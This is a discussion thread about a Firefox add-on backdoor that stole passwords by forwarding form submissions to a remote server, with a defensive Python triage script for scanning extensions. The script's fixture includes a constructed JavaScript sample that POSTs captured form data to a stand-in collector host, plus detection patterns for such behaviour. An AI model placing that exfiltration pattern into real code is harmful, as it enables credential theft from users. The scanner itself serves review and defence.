How the Mozilla Sniffer Backdoor Was Discovered
An anonymous reader writes "Mozilla pulled one of their Firefox add-ons earlier this week for containing a backdoor which stole passwords from its users. Netcraft has taken a closer look at how the rogue extension worked, and how it was discovered by chance rather than through any code review process. Mozilla are working on a new security model to stop this kind of backdoor happening again."
Good job not actually telling the name of the offending plugin in the article blurb there. 'A new severe bug in mozilla is allowing hooligans to steal your passwords. But we won't tell you which one until after the break!'
Is there? Apple's review process doesn't demand source (and, given the review volume, there is Absolutely. No. Way they would be giving proper attention to detecting subtle malice, even if they did). The review process seems to be reasonably good at weeding out applications that crash horribly often enough that the reviewer will run into a crash, which blatantly violate the rules, which seem likely to be fodder for stories that will tarnish Apple's PR, or which "duplicate" some feature that exists or is on Apple's secret roadmap. It has also been rumored that they have some sort of static analysis tool to detect use of private APIs.
Nothing in that process would detect any but the most blatantly unsubtle malice (and, given that reviews tend to occur fairly quickly, something as simple as recording the date of first run, and not doing anything evil until 1 month has passed would probably count as "subtle" for the purposes of this exercise).
If malice is detected by a third party, or by some after-the-fact spot-check, both Apple and Android have practically identical capabilities to "unpublish and remove" an application from any device that hasn't been divorced from the mothership. For that matter, Mozilla can also issue FF updates that disable add-ons (as they did a while back for that MS .NET one, and as they have announced they will do here).
>And since Opera is not open source, there is no way to be sure of that.
Sure there is, you can reverse-engineer it to see what it does. You know, just because all you have is the binary doesn't mean you've suddenly entered a magic land where nothing can be understood.
(I'm going to ignore "but can you trust your tools" asshattery)
Not only that, but the author couldn't even use proper English in the addon description:
Given that, I hate to say that "people had it coming", but I figure people had ample warning that they were trying something that could be malicious.
Unless you go through all the code yourself, there's no way to be sure of anything.
You mean unless you go through the code, compile it yourself using a compiler whose code you've also audited and which itself was not compiled by an unaudited compiler.
No, I've seen it. I used to have a pretty decent email pen-pal thing going on with Ken about 10 years ago. He's a pretty cool dude. The point is, yes, even if you see the code, unless you have the code to the compiler and build it yourself, then you can't trust the binary. Basically, you can't trust anything you don't create from scratch. There could also be back-doors in ROM in the hardware. Which is why I go on to say how even if you do your own audit you can't actually trust anything. Either you won't understand everything, you'll have taken in too much information and miss something vital or, as per your example, the real root of the problem will be so obscured from view that it doesn't even matter what you're auditing.
It was a modified version of Tamper Data that the author alleged "many problems have been solved in this version".
In addition to modifying several existing files, the author added a file called tamperPost.js that very deliberately sends every form submission to a remote server. You can see some of the code of this on the Netcraft article in the summary (or a direct link to the image).
When you see the image, you can see that it was obviously a deliberate attempt to steal credentials.
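As an added illustration (not code from the Netcraft article or from Mozilla), here is the kind of triage pass a reviewer could run over an unpacked extension: it flags scripts that both hook form or POST data and send to a host outside an assumed allow-list. The sample scripts and hostnames below are constructed; the real tamperPost.js is not reproduced.

```python
import re
from dataclasses import dataclass

# Broad triage patterns: code that touches submitted form / POST data,
# and code that sends data over the network.  Heuristics, not proof.
FORM_HOOKS = re.compile(r"\bsubmit\b|http-on-modify-request|\bFormData\b|postData", re.I)
NET_CALLS = re.compile(r"XMLHttpRequest|\bfetch\s*\(|\.send\s*\(", re.I)
URL_LITERAL = re.compile(r"https?://([A-Za-z0-9.-]+)")

@dataclass
class Finding:
    path: str
    hosts: list
    reason: str

def triage_script(path, source, allowed_hosts):
    """Flag a script that hooks form data AND contacts a host not in allowed_hosts."""
    hosts = sorted(set(URL_LITERAL.findall(source)))
    unexpected = [h for h in hosts if h not in allowed_hosts]
    if FORM_HOOKS.search(source) and NET_CALLS.search(source) and unexpected:
        return Finding(path, unexpected, "form hook + network send to undeclared host")
    return None

def triage_extension(files, allowed_hosts):
    """files maps path -> JS source (as read from an unpacked XPI)."""
    findings = []
    for path, source in files.items():
        if path.endswith(".js"):
            finding = triage_script(path, source, allowed_hosts)
            if finding:
                findings.append(finding)
    return findings

# Constructed samples: NOT the real tamperPost.js, only illustrative shapes.
SAMPLE_FILES = {
    "chrome/content/tamperPost.js": """
        observerService.addObserver(this, "http-on-modify-request", false);
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://collector.example.invalid/log", true);
        xhr.send(postData);""",
    "chrome/content/updater.js": """
        // runs after the options form submit; talks only to the declared host
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "https://addons.mozilla.org/", true); xhr.send(null);""",
    "chrome/content/tabs.js": "function label(tab) { return tab.title.trim(); }",
}
ALLOWED_HOSTS = {"addons.mozilla.org"}   # assumed: hosts the add-on declares it uses

def run_sample():
    return triage_extension(SAMPLE_FILES, ALLOWED_HOSTS)

if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.path}: {f.reason} -> {f.hosts}")
```

Only the script that combines a request hook with a POST to an undeclared host is reported; the updater that talks to the allow-listed host passes.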
Source is ok ... but can you trust your compiler?
You could try Dillo.
Jim: This source is fine.
:D
Jon: This is great, good work.
Jane: Clean and efficient, great addon.
*Create account: Jack*
Jack: Yeah, awesome stuff! Jim, Jon, and Jane are all correct.
*Create account: James*
James: I love this addon! No viruses here
TabGroups Manager. It's not the only extension of its kind, though: There's also Tree Style Tabs that gives you hierarchical, if space-intensive, tabs and Tab Kit, which apparently offers both functionalities in one package - however, I haven't tested it and can't say how well it works.
In case you're a beta user: Tree Style Tabs says it's 4.0b1-compatible; TabGroups Manager doesn't but works apart from a cosmetic issue (the tab group bar appears below the tab bar instead of above it).
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
Case in point: the Debian ssl fiasco, rendering all Debian as well as derivatives vulnerable to a simple attack for 2 years.
jwhois 74.220.219.77
[Querying whois.arin.net]
[whois.arin.net]
OrgName: Bluehost Inc.
OrgID: BLUEH-2
Address: 1958 South 950 East
City: Provo
StateProv: UT
PostalCode: 84606
Country: US
So has law enforcement been notified?